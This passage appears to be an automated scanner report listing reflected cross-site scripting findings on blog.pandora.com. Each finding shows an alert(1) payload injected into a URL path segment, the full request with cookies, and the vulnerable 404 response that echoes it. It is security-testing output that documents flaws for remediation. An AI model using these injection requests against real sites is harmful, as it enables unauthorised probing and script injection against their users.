<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorae5b43<script>alert(1)</script>94fa79588e1/archives/roadtrip/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3d8f8<script>alert(1)</script>102c29e82d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives3d8f8<script>alert(1)</script>102c29e82d/roadtrip/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives3d8f8<script>alert(1)</script>102c29e82d/roadtrip/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ccdb2<script>alert(1)</script>a59406e84d7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/roadtripccdb2<script>alert(1)</script>a59406e84d7/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:29 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/roadtripccdb2<script>alert(1)</script>a59406e84d7/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6e73b<script>alert(1)</script>402d0eee6e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora6e73b<script>alert(1)</script>402d0eee6e6/archives/roadtrip/index.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 360
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora6e73b<script>alert(1)</script>402d0eee6e6/archives/roadtrip/index.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e3124<script>alert(1)</script>06bc8e10aef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivese3124<script>alert(1)</script>06bc8e10aef/roadtrip/index.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:25 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 360
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivese3124<script>alert(1)</script>06bc8e10aef/roadtrip/index.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 94c76<script>alert(1)</script>fbd7c19bc2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/roadtrip94c76<script>alert(1)</script>fbd7c19bc2/index.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 359
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/roadtrip94c76<script>alert(1)</script>fbd7c19bc2/index.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3e61d<script>alert(1)</script>1df9109ab61 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/roadtrip/index.html3e61d<script>alert(1)</script>1df9109ab61 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:29 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 360
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/roadtrip/index.html3e61d<script>alert(1)</script>1df9109ab61 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8354d<script>alert(1)</script>0b81ccc9992 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8354d<script>alert(1)</script>0b81ccc9992/archives/south-daktoa/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:16 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora8354d<script>alert(1)</script>0b81ccc9992/archives/south-daktoa/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 26b1e<script>alert(1)</script>c6bfcd2ec61 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives26b1e<script>alert(1)</script>c6bfcd2ec61/south-daktoa/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:19 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives26b1e<script>alert(1)</script>c6bfcd2ec61/south-daktoa/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 11e8c<script>alert(1)</script>8fd48e0eb0b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/south-daktoa11e8c<script>alert(1)</script>8fd48e0eb0b/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 354 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/south-daktoa11e8c<script>alert(1)</script>8fd48e0eb0b/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a87e3<script>alert(1)</script>667affef35b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraa87e3<script>alert(1)</script>667affef35b/archives/tennessee/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:18 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraa87e3<script>alert(1)</script>667affef35b/archives/tennessee/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload be7ff<script>alert(1)</script>bb3bcc17fa5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbe7ff<script>alert(1)</script>bb3bcc17fa5/tennessee/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:20 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesbe7ff<script>alert(1)</script>bb3bcc17fa5/tennessee/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c0a19<script>alert(1)</script>050c2fa5c54 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/tennesseec0a19<script>alert(1)</script>050c2fa5c54/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:23 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/tennesseec0a19<script>alert(1)</script>050c2fa5c54/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2dd0c<script>alert(1)</script>f718eac7bb6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2dd0c<script>alert(1)</script>f718eac7bb6/archives/texas/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:33 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 347
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora2dd0c<script>alert(1)</script>f718eac7bb6/archives/texas/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 76e6c<script>alert(1)</script>5b51d9c237f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives76e6c<script>alert(1)</script>5b51d9c237f/texas/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:35 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 347
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives76e6c<script>alert(1)</script>5b51d9c237f/texas/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ea264<script>alert(1)</script>98cd7486264 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/texasea264<script>alert(1)</script>98cd7486264/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 347
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/texasea264<script>alert(1)</script>98cd7486264/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 54e68<script>alert(1)</script>3cadd9a1ed0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora54e68<script>alert(1)</script>3cadd9a1ed0/archives/utah/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 346
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora54e68<script>alert(1)</script>3cadd9a1ed0/archives/utah/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e0467<script>alert(1)</script>c653de1c429 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivese0467<script>alert(1)</script>c653de1c429/utah/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:24 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 346
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivese0467<script>alert(1)</script>c653de1c429/utah/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cc949<script>alert(1)</script>5818dec138e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/utahcc949<script>alert(1)</script>5818dec138e/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:26 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 346
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/utahcc949<script>alert(1)</script>5818dec138e/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cecee<script>alert(1)</script>65ebaa61d8c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoracecee<script>alert(1)</script>65ebaa61d8c/archives/virginia/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:24 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoracecee<script>alert(1)</script>65ebaa61d8c/archives/virginia/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8fd5b<script>alert(1)</script>50186e33060 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
